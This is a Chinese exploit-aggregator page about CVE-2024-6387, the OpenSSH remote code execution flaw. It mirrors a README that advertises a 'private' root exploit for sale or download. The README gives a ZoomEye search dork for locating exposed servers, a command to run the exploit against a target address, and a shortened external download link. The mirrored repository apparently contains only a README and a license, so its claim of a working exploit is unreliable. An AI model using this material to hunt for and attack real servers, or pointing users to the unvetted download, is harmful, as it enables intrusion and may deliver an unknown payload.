POC详情: 1963cd7001af99bed7147f26dcded0443cc2763e

来源
关联漏洞
标题: OpenSSH 安全漏洞 (CVE-2024-6387)
描述:OpenSSH(OpenBSD Secure Shell)是加拿大OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 存在安全漏洞,该漏洞源于信号处理程序中存在竞争条件,攻击者利用该漏洞可以在无需认证的情况下远程执行任意代码并获得系统控制权。
描述
Private x64 RCE exploit for CVE-2024-6387 [02.07.2024] from exploit.in
介绍
# CVE-2024-6387-Updated-x64bit
Private x64 RCE exploit (Python) for CVE-2024-6387 [02.07.2024] from exploit.in

> The repository provides a working variant of the CVE-2024-6387 vulnerability exploit with support for real-time active shell, multithreading, entering targets from a file, and color output.

## 🔥 **CVSS: 10/10**

## Description
An exploit for CVE-2024-6387, targeting a signal handler race condition in OpenSSH's server (sshd) on glibc-based Linux systems. The vulnerability allows for remote code execution as root due to async-signal-unsafe functions being called in the SIGALRM handler.

## Exploit details
The exploit targets the SIGALRM handler race condition in OpenSSH's sshd, which calls async-signal-unsafe functions. This can be leveraged to achieve remote code execution as root.

## Zoomeye dork
app:"OpenSSH"

## Vulnerable versions: 
OpenSSH 8.5p1 to 9.8p1

## Running

To run exploit you need Python 3.9.
Execute:
```bash
python exploit.py -h 10.10.10.10 -c 'id'
```

## Download
[Download here](https://t.ly/LPmmz) (securely!)

## Date of published: 01.07.2024
## Contact
principalanthony@exploit.in
文件快照

[4.0K] /data/pocs/1963cd7001af99bed7147f26dcded0443cc2763e ├── [1.0K] LICENSE └── [1.1K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。